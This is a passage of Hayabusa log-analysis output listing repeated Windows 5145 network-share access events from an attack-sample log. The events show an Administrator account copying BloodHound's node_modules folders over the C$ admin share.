Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.898 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.898 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.928 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.968 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.978 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.988 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.998 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.998 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.008 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.018 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.028 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.038 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.048 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.058 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.068 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.078 